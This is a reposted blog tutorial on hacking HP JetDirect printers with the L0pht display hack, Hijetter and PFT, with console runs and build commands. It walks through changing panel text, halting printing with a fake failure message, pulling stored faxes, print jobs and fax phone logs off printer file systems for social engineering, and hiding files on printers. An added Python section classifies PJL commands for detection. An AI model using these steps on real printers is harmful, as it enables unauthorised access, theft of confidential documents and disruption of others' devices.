
Bitácora Técnica de Tux&Cía., Santa Cruz de la Sierra, BO

Wednesday, May 25, 2011

HP JetDirect hacking

Source

Changing the LCD display text using HPhack, IGhphack or Hijetter
         This is an old hack (1997) and does not accomplish much, but it is fun! Silicosis of L0pht (sili@l0pht.com) wrote the original exploit code for *nix  systems and someone else ported it to NT/2000/XP based systems. Although it's been out there for a long time, it still works on every HP printer/JetDirect box I have seen. What the HP display hack allows you to do is set the text that displays on the little LCD panel of an HP printer. It accomplishes this over the network by sending packets to a JetDirect box hooked to the printer (or built into it).
        The first thing you need to do is find out the IP or hostname of the JetDirect box that services the printer. You can do this in one of at least three ways. The first way is by hitting the little test button on the JetDirect box that's connected to the printer. If the JetDirect card is built in you may have to go through the menus and choose "Print Configuration". Another way is to go into your "Printers and Faxes" settings, right click and bring up the properties of the printer in question, and look under the Ports tab for the hostname (npi******). Once you have this information it's easy to run Silicosis' little hack.
        To run it from Windows just use the following syntax: hpnt Hostname Message
Windows Example:
C:\>hpnt npi769e71 "Irongeek"
HP Display hack -- sili@l0pht.com
Hostname: npi769e71
Message: Irongeek
Connecting....
Sent 54 bytes


C:\>hpnt 192.168.1.14 "Irongeek Also"
HP Display hack -- sili@l0pht.com
Hostname: 192.168.1.14
Message: Irongeek Also
Connecting....
Sent 59 bytes


C:\>
        If you want to run it from Linux download the source code at the bottom of this section and compile it using gcc. The syntax is the same as the Windows version. Below is an example of how to compile and run it:
[root@balrog root]# gcc -o hphack hp.c
hp.c:28:12: warning: multi-line string literals are deprecated
[root@balrog root]# ./hphack 192.168.1.14  "Irongeek"
HP Display hack -- sili@l0pht.com
Hostname: 192.168.1.14
Message: Irongeek
Connecting....
Sent 54 bytes

[root@balrog root]#
        A few ideas for messages: "Hey Baby", "X was Here", "I see You", "Redrum", "Kill". Enjoy. If you like you can download Silicosis' hack from one of these links:
        I'm working on my own GUI version with extra features; its web page can be found here:
        Unfortunately it's pretty buggy.
        The easiest tool to use may be Hijetter by FtR of Phenoelit, which is covered in the next section.




Phenoelit's Hijetter and PFT 
        Hijetter seems to be the Swiss army knife of HP JetDirect hacking. It can control a JetDirect box with PJL commands, and works even if a password is set (at least on my HP JetDirect 300X). You can download the binary and the source code for this app from:
        Below is a screen shot of Hijetter's interface. To use Hijetter just type in the IP or host name of your JetDirect box and click the connect icon.
        You should notice that a few of the icons at the bottom of the interface light up.
        You can only use the icons that are lit up. The first icon, from left to right, lets you control the file system on the JetDirect (if it has one), the next icon lets you make changes to the settings and the last icon lets you set the text that displays on the LCD screen. I'll cover these tasks in reverse order since I'm contrary like that.
Setting the LCD Display with Hijetter
1. After you have connected to the JetDirect box click the LCD Display icon.
2. Type in the message you want the printer's LCD to display.
3. If you check the "Failure" radio button the printer will stop printing until someone hits the ok/continue/online button on the printer, or it's reset.
4. Click the confirm button and your message should now appear on the printer's LCD.



Changing settings with Hijetter
1. After you have connected to the JetDirect box click the settings icon.
2. Find the environmental variable you want to change and type in the value you want to set it to, keeping in mind the limitations listed in the "Info" panel.
3. Use the assign button to set your change. An M should appear next to the variable you changed. 
4. Click the confirm button and you're done.
 
 
 
 
 
Using Hijetter to treat some JetDirect boxes as file/web servers
1. After you have connected to the JetDirect box click the File System icon.
2. Use the arrows to transfer files to and from your client to the JetDirect box. Keep in mind that you can only transfer one file at a time with Hijetter.
3. The New Folder and Delete icons can be used for their obvious functions.
4. Click the confirm button and you're done.
 
 
 
 
 
Finding stored faxes and print jobs on Jetdirect printers
        Look around the file system and download any files that look interesting. Most of them don't have obvious file extensions so open them up in a text editor and look at the headers to try and figure out what they are. Here are a few of the things I've found by searching around this way:

Location                        What I've found
/saveDevice/DigitalSend/jobs    JPEGs with names like DS000848.005 that seem to be either print jobs or faxes.
/FaxOut                         TIF files from sent faxes.
/FaxIn                          PCL files from received faxes. See my NetCat and FTP tricks later for more information on how to print them.
/Fax/act.log                    Seems to be a log of phone numbers where things have been faxed to or from. Could be useful for social engineering.

         Also notice that the Hewlett-Packard LaserJet 4100 MFP we connected to has a 20Gig hard drive, which makes for a great place to hide and serve large files. I've noticed on the MFP a file can be uploaded to:
        /webserver/home/
and can be accessed from the printer's web interface at:
        http://192.168.1.4/hp/device/

        For example, if you used Hijetter to upload "naughtylinuxgirls.avi" to "/webserver/home/" it can be accessed from the web with the URL:
        http://192.168.1.4/hp/device/naughtylinuxgirls.avi
        Feel free to put your homepage on a printer. :)
        If you're a *nix or Windows command line boy, don't despair. The same folks from Phenoelit have provided PFT, a command line utility that can do many of the same things as Hijetter. It can be downloaded and installed with these commands:
mkdir pjllib
cd pjllib
wget http://www.phenoelit.de/hp/libPJL-1.3-src.tgz
tar -xzf libPJL-1.3-src.tgz
make
cd pft/
make

        Here is an example of what it looks like on the command line after you bring up the help page; look at all of the options:
 
Irongeek:/home/adrian/pjllib/pft# ./pft
PFT - PJL file transfer
FX of Phenoelit
Version 0.7 ($Revision: 1.8 $)

pft> help
help
quit
server [hostname]
port [port number]
connect
close
env {read|print|show|set|options|changed|commit|unprotect|bruteforce}
message "Display Msg"
failure "Failure Msg"
volumes
chvol [vol:]
pwd
ls
cd [directory]
mkdir [directory]
rm [file]
get [file]
put [local file]
append [local file] [file]
lpwd
lcd [directory]
session
timeout [timeout]
pause
pft>
PFT also has some limited scripting ability by piping in commands from a text file as this example shows:
Irongeek:/home/adrian/pjllib/pft# cat mypftscript.txt
server 192.168.31.213
connect
ls
quit

Irongeek:/home/adrian/pjllib/pft# ./pft < mypftscript.txt
PFT - PJL file transfer
FX of Phenoelit
Version 0.7 ($Revision: 1.8 $)

pft> Server set to 192.168.31.213
pft> Connected to 192.168.31.213:9100
Device: HP LaserJet 4100 MFP
pft> 0:\
. - d
.. - d
PermStore - d
PostScript - d
PJL - d
saveDevice - d
cpbLog 5227 -
Fax - d
solution - d
webServer - d
FaxOut - d
FaxIn - d
pft>

Irongeek:/home/adrian/pjllib/pft#
        Since Phenoelit provides the source code, it could be an interesting project to write new automated tools for extracting information from remote JetDirect boxes.
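
        The display hack, Hijetter and PFT all speak plain PJL to the JetDirect box on raw TCP port 9100, so a network sensor can tell these control sessions apart from ordinary print jobs. The following is an added example, not code from the original post or from Phenoelit: it classifies reassembled port-9100 payloads by PJL command. The command names are those in HP's PJL Technical Reference; the category labels, the severity policy and the sample flows are assumptions constructed for illustration.

```python
import re

UEL = b"\x1b%-12345X"  # Universal Exit Language, frames PJL on raw port 9100

# PJL command names from HP's PJL Technical Reference; the category labels
# and the triage policy below are this example's own choices.
CATEGORY = {
    "RDYMSG": "display", "OPMSG": "display", "STMSG": "display",
    "DEFAULT": "persistent-setting",
    "FSDIRLIST": "fs-read", "FSQUERY": "fs-read", "FSUPLOAD": "fs-read",
    "FSDOWNLOAD": "fs-write", "FSAPPEND": "fs-write",
    "FSMKDIR": "fs-write", "FSDELETE": "fs-write",
}
PJL_CMD = re.compile(rb"@PJL[ \t]+([A-Za-z]+)")

def classify(payload):
    """Summarise the PJL commands seen in one reassembled TCP/9100 payload."""
    cmds = [m.group(1).decode("ascii").upper() for m in PJL_CMD.finditer(payload)]
    cats = sorted({CATEGORY[c] for c in cmds if c in CATEGORY})
    # Print jobs hand over to a page language with ENTER LANGUAGE; the
    # control sessions described on this page send PJL only.
    return {"categories": cats, "control_only": "ENTER" not in cmds}

def triage(flows):
    """Return (src, dst, severity, categories) for flows worth reviewing."""
    alerts = []
    for src, dst, payload in flows:
        info = classify(payload)
        cats = info["categories"]
        if any(c != "display" for c in cats):
            alerts.append((src, dst, "high", cats))    # files or stored settings
        elif cats and info["control_only"]:
            alerts.append((src, dst, "medium", cats))  # panel text, no print data
    return alerts

# Constructed sample flows (documentation addresses, made-up payloads).
SAMPLE_FLOWS = [
    ("192.0.2.21", "192.0.2.50", UEL + b'@PJL JOB NAME="report"\r\n'
     b"@PJL SET COPIES=1\r\n@PJL ENTER LANGUAGE=PCL\r\n<page data>" + UEL),
    ("192.0.2.77", "192.0.2.50", UEL + b'@PJL RDYMSG DISPLAY="hello"\r\n' + UEL),
    ("192.0.2.77", "192.0.2.50", UEL + b'@PJL FSDIRLIST NAME="0:\\"\r\n' + UEL),
    ("192.0.2.77", "192.0.2.50", UEL + b'@PJL FSUPLOAD NAME="0:\\FaxIn\\sample"\r\n' + UEL),
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_FLOWS):
        print(alert)
```

        In this policy any file system or stored-setting command is flagged regardless of context, while a display message is flagged only when the session carries no print data.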
